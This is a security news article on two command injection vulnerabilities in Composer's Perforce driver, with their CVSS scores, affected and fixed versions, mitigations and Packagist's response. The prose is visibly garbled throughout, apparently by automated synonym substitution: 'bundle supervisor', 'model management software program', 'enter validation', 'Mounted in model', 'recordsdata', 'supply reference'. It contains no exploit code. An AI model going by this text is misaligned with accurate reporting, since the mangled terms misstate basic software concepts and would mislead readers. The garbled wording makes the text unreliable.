Two high-severity security vulnerabilities have been disclosed in Composer, a bundle supervisor for PHP, that, if efficiently exploited, may lead to arbitrary command execution.
The vulnerabilities have been described as command injection flaws affecting the Perforce VCS (model management software program) driver. Particulars of the 2 flaws are under –
- CVE-2026-40176 (CVSS rating: 7.8) – An improper enter validation vulnerability that might permit an attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository to inject arbitrary instructions, leading to command execution within the context of the person working Composer.
- CVE-2026-40261 (CVSS rating: 8.8) – An improper enter validation vulnerability stemming from insufficient escaping that might permit an attacker to inject arbitrary instructions by a crafted supply reference containing shell metacharacters.
In each circumstances, Composer would execute these injected instructions even when Perforce VCS is just not put in, the maintainers famous in an advisory.
The vulnerabilities have an effect on the next variations –
- >= 2.3, < 2.9.6 (Mounted in model 2.9.6)
- >= 2.0, < 2.2.27 (Mounted in model 2.2.27)
If rapid patching is just not an possibility, it is suggested to examine composer.json recordsdata earlier than working Composer and confirm that Perforce-related fields comprise legitimate values. It is also really helpful to solely use trusted Composer repositories, run Composer instructions on initiatives from trusted sources, and keep away from putting in dependencies utilizing the “–prefer-dist” or the “preferred-install: dist” configuration setting.
Composer mentioned it scanned Packagist.org and didn’t discover any proof of the aforementioned vulnerabilities being exploited by menace actors by publishing packages with malicious Perforce info. A brand new launch is anticipated to be shipped for Non-public Packagist Self-Hosted prospects.
“As a precaution, publication of Perforce supply metadata has been disabled on Packagist.org since Friday, April tenth, 2026,” it mentioned. “Composer installations ought to be up to date instantly regardless.”
